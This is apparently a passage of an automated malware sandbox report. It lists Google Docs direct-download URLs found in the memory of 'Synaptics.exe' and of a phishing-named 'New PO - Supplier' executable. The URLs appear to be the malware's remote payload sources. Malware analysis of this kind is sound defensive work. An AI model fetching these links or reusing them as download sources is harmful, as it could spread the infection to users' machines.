                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadonte
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoo=
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadoogle
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador..
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloador...
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadorigi
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadou
                                Source: Synaptics.exe, 00000002.00000002.4177290869.000000001D74A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4209599990.0000000023F7E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadp
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpD
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadpO
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadps
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqH
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqd
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqg
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadqi
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr...
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr2
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadr:
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrG
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrch
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadre
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrive.
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadrse
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4141841776.000000000F0D0000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads-fo
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloads1j
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsK
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadseQ
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadsvj
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.000000000088B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt%
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt.go
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt1E
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadt:15p
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtB2
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtI
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtd1
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtedCo
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtfor
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadth
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleni
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtleniS
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtr
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtsq
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadtta
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadty-P
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4139287238.000000000EFD2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.00000000081C6000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DB27000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4188042164.000000001DCEB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduc
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaducati
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduh
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaduld.
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadund)
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadu~
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008CD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadv
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvL
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvers
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvi
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvicesi
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvk
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadvn1
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadw0
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadwE
                                Source: Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4093452234.000000000818E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadx
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxA6
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadxN
                                Source: Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4194221853.000000001DE3B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady2
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloady:
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyG
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyb
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyg
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor.
                                Source: Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadyor..
                                Source: Synaptics.exe, 00000002.00000002.4138668254.000000000EF66000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA7A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.2572800198.000000003BBB8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4144627466.000000000F1F8000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadz1
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzF
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadzS
                                Source: Synaptics.exe, 00000002.00000002.4093452234.000000000821B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadze
                                Source: Synaptics.exe, 00000002.00000002.4093452234.0000000008163000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000003.3133796406.000000001DA36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4140312105.000000000F03E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4177290869.000000001D6C2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4186823841.000000001DBDD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4085838285.000000000568F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000002.00000002.4181138413.000000001D7E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D93E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~I
                                Source: Synaptics.exe, 00000002.00000002.4182788961.000000001D88E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~K
                                Source: Synaptics.exe, 00000002.00000002.4055737675.00000000008DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~R
                                Source: Synaptics.exe, 00000002.00000002.4093452234.00000000080AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~vg
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000003.1689829059.0000000002200000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                                Source: New PO - Supplier 0202AW-PER2.exe, 00000000.00000000.1681174852.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Synaptics.exe, Synaptics.exe, 00000002.00000002.4077968992.00000000022E0000.00000004.00001000.00020000.00000000.sdmp, ~$cache1.2.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
